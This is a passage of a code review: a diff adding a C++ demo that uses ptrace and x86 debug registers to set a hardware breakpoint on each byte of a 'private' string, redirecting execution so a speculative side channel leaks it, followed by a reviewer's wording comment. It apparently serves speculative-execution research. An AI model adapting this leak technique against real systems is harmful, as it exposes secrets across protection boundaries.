demos/speculation_over_hw_breakpoint.cc

```diff
@@ -0,0 +1,203 @@
+  // in private data.
+  size_t public_data_length = strlen(public_data);
+
+  // Allow the parent to trace child's execution.
+  int res = ptrace(PTRACE_TRACEME, 0, nullptr, nullptr);
+  if (res == -1) {
+    std::cerr << "PTRACE_TRACEME failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < private_data_length; ++i) {
+    // Synchronize with the parent. Let it setup the hardware breakpoint on the
+    // next character.
+    raise(SIGSTOP);
+    MemoryAndSpeculationBarrier();
+    std::cout << LeakByte(public_data, public_data_length, private_offset + i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}
+
+void ParentProcess(pid_t child) {
+  // Index of the breakpoint in the private data.
+  size_t index = 0;
+  while (true) {
+    int wstatus, res;
+    wait(&wstatus);
+    if (WIFSTOPPED(wstatus) && WSTOPSIG(wstatus) == SIGSTOP) {
+      // The child stopped itself with "raise(SIGSTOP)". We have to put the
+      // breakpoint on the current character of private_data and let it
+      // continue.
+      // Pointing dr0 on the current index in private_data and incrementing
+      // the index.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[0]),
+                   private_data + index++);
+      if (res == -1) {
+        std::cerr << "PTRACE_POKEUSER on dr0 failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Setting the 0th, 15th and 16th bit in dr7.
+      // 0th bit means the active breakpoint is in local dr0.
+      // 15th and 16th bits mean the trap activates on each read and write.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[7]),
+                   0x30001);
+      if (res == -1) {
+        std::cerr << "PTRACE_POKEUSER on dr7 failed." << errno << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Wake up the child.
+      res = ptrace(PTRACE_CONT, child, nullptr, nullptr);
+      if (res == -1) {
+        std::cerr << "PTRACE_CONT after SIGSTOP failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+    } else if (WIFSTOPPED(wstatus) && WSTOPSIG(wstatus) == SIGTRAP) {
+      // The child was trapped by stepping on the hardware breakpoint. We just
+      // move its instruction pointer to the afterspeculation label.
+      user_regs_struct regs;
+      // Read general purpose register values of the child.
+      res = ptrace(PTRACE_GETREGS, child, nullptr, &regs);
+      if (res == -1) {
+        std::cerr << "PTRACE_GETREGS failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Move the child's instruction pointer to afterspeculation.
+#ifdef __x86_64__
+      regs.rip = reinterpret_cast<size_t>(afterspeculation);
+#else
+      regs.eip = reinterpret_cast<size_t>(afterspeculation);
+#endif
+
+      // Store the exchanged child's instruction pointer value.
```

Comment:
not sure "exchanged" is the right word here

Reply:
Changed to shifted.